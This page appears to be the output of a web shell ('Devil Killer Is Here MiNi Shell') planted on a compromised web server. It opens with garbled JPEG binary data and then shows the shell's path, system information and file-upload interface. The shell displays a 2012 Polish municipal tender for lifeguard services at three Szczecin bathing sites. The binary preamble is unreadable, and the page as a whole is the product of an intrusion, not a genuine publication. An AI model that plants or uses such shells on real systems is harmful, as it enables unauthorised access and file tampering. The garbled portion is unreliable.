JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120518/111511-N-2012.html

<p class="kh_header"><b>Szczecin: WYKONYWANIE RATOWNICTWA WODNEGO 
NA SZCZECIŃSKICH KĄPIELISKACH
(w podziale na części)</b><br>
<b>Numer ogłoszenia: 111511 - 2012; data zamieszczenia: 18.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Komunalnych , ul. Ku Słońcu 125a, 71-080 Szczecin, woj. zachodniopomorskie, tel. 091 484 82 94, faks 091 484 80 55.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zuk.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna jednostki samorządu terytorialnego - samorządowy zakład budżetowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONYWANIE RATOWNICTWA WODNEGO 
NA SZCZECIŃSKICH KĄPIELISKACH
(w podziale na części).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. 	Przedmiotem zamówienia jest wykonywanie ratownictwa wodnego na szczecińskich kąpieliskach (w podziale na części):



1) 	część I - Wykonywanie ratownictwa wodnego na kąpielisku Głębokie  
2) 	część II - Wykonywanie ratownictwa wodnego na kąpielisku Dziewoklicz
3) 	część III - 	Wykonywanie ratownictwa wodnego na kąpielisku Dąbie
     CPV 75252000-7
2.	Podmiotami uprawnionymi do wykonywania ratownictwa wodnego, zgodnie z art. 12 
ust. 1 ustawy z dnia 18 sierpnia 2011 r. o bezpieczeństwie osób przebywających 
na obszarach wodnych (Dz.U. z 2011 r. Nr 208 poz. 1240 ze zmianami) są Wodne Ochotnicze Pogotowie Ratunkowe oraz inne podmioty, jeżeli uzyskały zgodę ministra właściwego do spraw wewnętrznych na wykonywanie ratownictwa wodnego, przy uwzględnieniu art. 40 ww. ustawy.
3.   Zakres przedmiotu zamówienia obejmuje m. in.:
1)	zapewnienie obsady i koordynacji pracy ratowników, zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych z dnia 23 stycznia 2012 r. w sprawie minimalnych wymagań dotyczących liczby ratowników wodnych zapewniających stałą kontrolę wyznaczonego obszaru wodnego (Dz.U. z 2012 r. Nr 108),
2)	zapewnienie warunków do organizowania pomocy oraz ratowania osób, które uległy wypadkowi lub są narażone na niebezpieczeństwo utraty życia lub zdrowia,
3)	zapewnienie stałej kontroli wyznaczonego obszaru wodnego przez ratowników   wodnych, zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych z dnia 6 marca 2012 r.  w sprawie sposobu oznakowania i zabezpieczania obszarów wodnych oraz wzorów znaków zakazu, nakazu oraz znaków informacyjnych i flag (Dz.U. z 2012 r. Nr 286), m.in.:
a)  wytyczenie strefy dla umiejących i nieumiejących pływać,
	b)  wydzielenie brodzika dla dzieci,
4)	utworzenie stanowisk do obserwacji wyznaczonego obszaru wodnego,
5)	 wyposażenie w sprzęt ratunkowy i pomocniczy oraz urządzenie sygnalizacyjne 
i ostrzegawcze, zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych z dnia 
27 lutego 2012 r. w sprawie wymagań dotyczących wyposażenia wyznaczonych obszarów wodnych w sprzęt ratunkowy i pomocniczy, urządzenia sygnalizacyjne 
i ostrzegawcze oraz sprzęt medyczny, leki i artykuły sanitarne (Dz.U. z 2012 r. 
Nr 261),
6)	oczyszczanie powierzchni dna obszaru przeznaczonego do pływania i kąpieli 
z wszelkich przedmiotów mogących spowodować skaleczenie lub inny wypadek,
7)	upowszechnianie zasad korzystania z wyznaczonego obszaru wodnego,
8)	obowiązki ratowników wodnych, zgodnie z ustawą z dnia 18 sierpnia 2011 r. 
o bezpieczeństwie osób przebywających na obszarach wodnych (Dz.U. z 2011 r. Nr 208 poz. 1240 ze zmianami) obejmujące m.in.:
  a)  stałe obserwowanie obszaru kąpieliska i niezwłoczne reagowanie na każdy sygnał wzywania pomocy oraz podejmowania akcji ratowniczej,
  b)	kontrola stanu urządzeń oraz sprzętu, które zapewniają bezpieczeństwo osób kąpiących się,
  c)	kontrola stref dla umiejących i nieumiejących pływać,
  d)	wywieszanie na maszcie odpowiednich kolorów flag informacyjnych,
  e)	sygnalizowanie za pomocą urządzeń alarmowych, przekroczeń obowiązującego regulaminu (np. granicy strefy dla umiejących pływać, skoki do wody), nadchodzącej burzy,
  f)	reagowanie na wszelkie wypadki naruszenia regulaminu obowiązującego na terenie kąpieliska lub pływalni,
  g)	wpisywanie na tablicy informacyjnej temperatury wody, temperatury powietrza oraz innych aktualnych informacji,
  h)	codzienne kontrolowanie głębokości wody przed otwarciem kąpieliska, a w razie potrzeby - przesunięcie lub czasowe wyłączenie określonych obszarów kąpieliska z używalności, miejsca kąpieli,
  i)  oczyszczanie powierzchni i dna obszaru przeznaczonego do kąpieli z wszelkich przedmiotów mogących spowodować skaleczenia lub inny nieszczęśliwy wypadek, przy udziale wyznaczonego pracownika kąpieliska i potwierdzenie wpisem do dziennika pracy,
 j)	bieżące prowadzenie dziennika pracy,
     9)   zapewnienia sprzętu ratowniczego, sprzętu do udzielania pierwszej pomocy,
            wyposażenia ratowników, napojów dla ratowników (1 l dziennie na osobę),
    10)	ścisłą współpracę z Kierownikiem kąpieliska oraz natychmiastowe informowanie 
            Kierownika kąpieliska o każdym zdarzeniu wymagającym interwencji.	
4.  Kierownik kąpieliska z częstotliwością nie mniejszą niż raz na dwa tygodnie będzie
	przeprowadzał niezapowiedzianą kontrolę prawidłowości pracy ratowników na kąpielisku, 
	w tym m. in.:
	1)	aktualność wpisów w dzienniku pracy,
	2)	obsadę stanowisk ratowniczych i wyposażenia.
5.	Długość linii brzegowej:
	1)   kąpielisko Głębokie: 100 mb,
	2)   kąpielisko Dziewoklicz: 96 mb,
    	3)   kąpielisko Dąbie: 98 mb.
6.	Wykonawca będzie zobowiązany do wykonania przedmiotu zamówienia z najwyższą starannością i na zasadzie zapewnienia najwyższej jakości usług oraz zgodnie 
z przepisami prawa powszechnie obowiązującego, w tym m. in.:
	1)	ustawą z dnia 18 sierpnia 2011 r. o bezpieczeństwie osób przebywających 
na obszarach wodnych (Dz.U. z 2011 r. Nr 208 poz. 1240 ze zmianami),
	2)	rozporządzeniem Ministra Spraw Wewnętrznych z dnia 23 stycznia 2012 r. w sprawie minimalnych wymagań dotyczących liczby ratowników wodnych zapewniających stałą kontrolę wyznaczonego obszaru wodnego (Dz.U. z 2012 r. Nr 108),
	3)	rozporządzeniem Ministra Spraw Wewnętrznych z dnia 6 marca 2012 r.  w sprawie sposobu oznakowania i zabezpieczania obszarów wodnych oraz wzorów znaków zakazu, nakazu oraz znaków informacyjnych i flag (Dz.U. z 2012 r. Nr 286),
	4)	rozporządzeniem Ministra Spraw Wewnętrznych z dnia 27 lutego 2012 r. w sprawie wymagań dotyczących wyposażenia wyznaczonych obszarów wodnych w sprzęt ratunkowy i pomocniczy, urządzenia sygnalizacyjne i ostrzegawcze oraz sprzęt medyczny, leki i artykuły sanitarne (Dz.U. z 2012 r. Nr 261),
      a także z zapisami Specyfikacji Istotnych Warunków Zamówienia i z ofertą, które będą
      stanowiły integralną część umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 75.25.20.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy ubiegający się o udzielenie zamówienia musi spełniać warunek dotyczący:
1)	posiadania wiedzy i doświadczenia.
Opis sposobu dokonywania oceny spełniania warunku: 
Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie  prace podobne do prac objętych przedmiotem zamówienia.
Za pracę podobną do przedmiotu zamówienia Zamawiający uzna pracę polegającą na wykonaniu ratownictwa wodnego na wyznaczonym obszarze wodnym, o wartości nie mniejszej niż 60 000 zł brutto.

Powyższy warunek nie musi być spełniony odrębnie dla każdej części, na którą Wykonawca składa ofertę. 

		W przypadku, gdy jakakolwiek wartość dotycząca ww. warunku została wyrażona 
w walucie obcej, Zamawiający przeliczy tą wartość w oparciu o średni kurs walut NBP dla danej waluty z daty wszczęcia postępowania o udzielenie zamówienia publicznego (datą wszczęcia postępowania jest data zamieszczenia ogłoszenia 
o zamówieniu w miejscu publicznie dostępnym w siedzibie Zamawiającego oraz na stronie internetowej).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto wykonawcy mają dołączyć do oferty następujące dokumenty:
       1)  ofertę cenową - zgodnie z rozdziałem I pkt 3 SIWZ;
 	W przypadku składania oferty wspólnej należy złożyć jedną ofertę cenową;
        2) 	odpowiednie pełnomocnictwa;  
	Tylko w sytuacjach określonych w rozdziale I pkt 5 zdanie drugie SIWZ lub 
	w przypadku składania oferty wspólnej (rozdział III pkt 1 SIWZ); 
       3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do SIWZ, wskazujące cześć 	zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli 	wykonawca przewiduje udział podwykonawców);
            W przypadku składania oferty wspólnej należy złożyć jedno oświadczenie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zuk.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego - 71-080 Szczecin, ul. Ku Słońcu 125A; pok. 17-18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2012 godzina 10:00, miejsce: Siedziba Zamawiającego - 71-080 Szczecin, ul. Ku Słońcu 125A; sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca 
w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów (oryginał lub kopia poświadczona za zgodność z oryginałem przez te podmioty) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.  
2. Przed podpisaniem umowy, Wykonawca przedłoży Zamawiającemu:
1)	dokument, z którego będzie wynikało upoważnienie do składania oświadczeń woli 
w imieniu Wykonawcy, o ile dokument ten nie został załączony do oferty;
2)	w przypadku gdy Wykonawca jest innym podmiotem niż Wodne Ochotnicze Pogotowie Ratunkowe - zgodę ministra właściwego do spraw wewnętrznych, zgodnie z art. 12 ust. 1 ustawy z dnia 18 sierpnia 2011 r. o bezpieczeństwie osób przebywających na obszarach wodnych (Dz.U. z 2011 r. Nr 208 poz. 1240 
ze zmianami), przy uwzględnieniu art. 40 ww. ustawy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonywanie ratownictwa wodnego na kąpielisku Głębokie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje m. in.:
1)	zapewnienie obsady i koordynacji pracy ratowników, zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych z dnia 23 stycznia 2012 r. w sprawie minimalnych wymagań dotyczących liczby ratowników wodnych zapewniających stałą kontrolę wyznaczonego obszaru wodnego (Dz.U. z 2012 r. Nr 108),
2)	zapewnienie warunków do organizowania pomocy oraz ratowania osób, które uległy wypadkowi lub są narażone na niebezpieczeństwo utraty życia lub zdrowia,
3)	zapewnienie stałej kontroli wyznaczonego obszaru wodnego przez ratowników   wodnych, zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych z dnia 6 marca 2012 r.  w sprawie sposobu oznakowania i zabezpieczania obszarów wodnych oraz wzorów znaków zakazu, nakazu oraz znaków informacyjnych i flag (Dz.U. z 2012 r. Nr 286), m.in.:
a)  wytyczenie strefy dla umiejących i nieumiejących pływać,
	b)  wydzielenie brodzika dla dzieci,
4)	utworzenie stanowisk do obserwacji wyznaczonego obszaru wodnego,
5)	 wyposażenie w sprzęt ratunkowy i pomocniczy oraz urządzenie sygnalizacyjne 
i ostrzegawcze, zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych z dnia 
27 lutego 2012 r. w sprawie wymagań dotyczących wyposażenia wyznaczonych obszarów wodnych w sprzęt ratunkowy i pomocniczy, urządzenia sygnalizacyjne 
i ostrzegawcze oraz sprzęt medyczny, leki i artykuły sanitarne (Dz.U. z 2012 r. 
Nr 261),
6)	oczyszczanie powierzchni dna obszaru przeznaczonego do pływania i kąpieli 
z wszelkich przedmiotów mogących spowodować skaleczenie lub inny wypadek,
7)	upowszechnianie zasad korzystania z wyznaczonego obszaru wodnego,
8)	obowiązki ratowników wodnych, zgodnie z ustawą z dnia 18 sierpnia 2011 r. 
o bezpieczeństwie osób przebywających na obszarach wodnych (Dz.U. z 2011 r. Nr 208 poz. 1240 ze zmianami) obejmujące m.in.:
  a)  stałe obserwowanie obszaru kąpieliska i niezwłoczne reagowanie na każdy sygnał wzywania pomocy oraz podejmowania akcji ratowniczej,
  b)	kontrola stanu urządzeń oraz sprzętu, które zapewniają bezpieczeństwo osób kąpiących się,
  c)	kontrola stref dla umiejących i nieumiejących pływać,
  d)	wywieszanie na maszcie odpowiednich kolorów flag informacyjnych,
  e)	sygnalizowanie za pomocą urządzeń alarmowych, przekroczeń obowiązującego regulaminu (np. granicy strefy dla umiejących pływać, skoki do wody), nadchodzącej burzy,
  f)	reagowanie na wszelkie wypadki naruszenia regulaminu obowiązującego na terenie kąpieliska lub pływalni,
  g)	wpisywanie na tablicy informacyjnej temperatury wody, temperatury powietrza oraz innych aktualnych informacji,
  h)	codzienne kontrolowanie głębokości wody przed otwarciem kąpieliska, a w razie potrzeby - przesunięcie lub czasowe wyłączenie określonych obszarów kąpieliska z używalności, miejsca kąpieli,
  i)  oczyszczanie powierzchni i dna obszaru przeznaczonego do kąpieli z wszelkich przedmiotów mogących spowodować skaleczenia lub inny nieszczęśliwy wypadek, przy udziale wyznaczonego pracownika kąpieliska i potwierdzenie wpisem do dziennika pracy,
 j)	bieżące prowadzenie dziennika pracy,
     9)   zapewnienia sprzętu ratowniczego, sprzętu do udzielania pierwszej pomocy,
            wyposażenia ratowników, napojów dla ratowników (1 l dziennie na osobę),
    10)	ścisłą współpracę z Kierownikiem kąpieliska oraz natychmiastowe informowanie 
            Kierownika kąpieliska o każdym zdarzeniu wymagającym interwencji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.25.20.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonywanie ratownictwa wodnego na kąpielisku Dziewoklicz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje m. in.:
1)	zapewnienie obsady i koordynacji pracy ratowników, zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych z dnia 23 stycznia 2012 r. w sprawie minimalnych wymagań dotyczących liczby ratowników wodnych zapewniających stałą kontrolę wyznaczonego obszaru wodnego (Dz.U. z 2012 r. Nr 108),
2)	zapewnienie warunków do organizowania pomocy oraz ratowania osób, które uległy wypadkowi lub są narażone na niebezpieczeństwo utraty życia lub zdrowia,
3)	zapewnienie stałej kontroli wyznaczonego obszaru wodnego przez ratowników   wodnych, zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych z dnia 6 marca 2012 r.  w sprawie sposobu oznakowania i zabezpieczania obszarów wodnych oraz wzorów znaków zakazu, nakazu oraz znaków informacyjnych i flag (Dz.U. z 2012 r. Nr 286), m.in.:
a)  wytyczenie strefy dla umiejących i nieumiejących pływać,
	b)  wydzielenie brodzika dla dzieci,
4)	utworzenie stanowisk do obserwacji wyznaczonego obszaru wodnego,
5)	 wyposażenie w sprzęt ratunkowy i pomocniczy oraz urządzenie sygnalizacyjne 
i ostrzegawcze, zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych z dnia 
27 lutego 2012 r. w sprawie wymagań dotyczących wyposażenia wyznaczonych obszarów wodnych w sprzęt ratunkowy i pomocniczy, urządzenia sygnalizacyjne 
i ostrzegawcze oraz sprzęt medyczny, leki i artykuły sanitarne (Dz.U. z 2012 r. 
Nr 261),
6)	oczyszczanie powierzchni dna obszaru przeznaczonego do pływania i kąpieli 
z wszelkich przedmiotów mogących spowodować skaleczenie lub inny wypadek,
7)	upowszechnianie zasad korzystania z wyznaczonego obszaru wodnego,
8)	obowiązki ratowników wodnych, zgodnie z ustawą z dnia 18 sierpnia 2011 r. 
o bezpieczeństwie osób przebywających na obszarach wodnych (Dz.U. z 2011 r. Nr 208 poz. 1240 ze zmianami) obejmujące m.in.:
  a)  stałe obserwowanie obszaru kąpieliska i niezwłoczne reagowanie na każdy sygnał wzywania pomocy oraz podejmowania akcji ratowniczej,
  b)	kontrola stanu urządzeń oraz sprzętu, które zapewniają bezpieczeństwo osób kąpiących się,
  c)	kontrola stref dla umiejących i nieumiejących pływać,
  d)	wywieszanie na maszcie odpowiednich kolorów flag informacyjnych,
  e)	sygnalizowanie za pomocą urządzeń alarmowych, przekroczeń obowiązującego regulaminu (np. granicy strefy dla umiejących pływać, skoki do wody), nadchodzącej burzy,
  f)	reagowanie na wszelkie wypadki naruszenia regulaminu obowiązującego na terenie kąpieliska lub pływalni,
  g)	wpisywanie na tablicy informacyjnej temperatury wody, temperatury powietrza oraz innych aktualnych informacji,
  h)	codzienne kontrolowanie głębokości wody przed otwarciem kąpieliska, a w razie potrzeby - przesunięcie lub czasowe wyłączenie określonych obszarów kąpieliska z używalności, miejsca kąpieli,
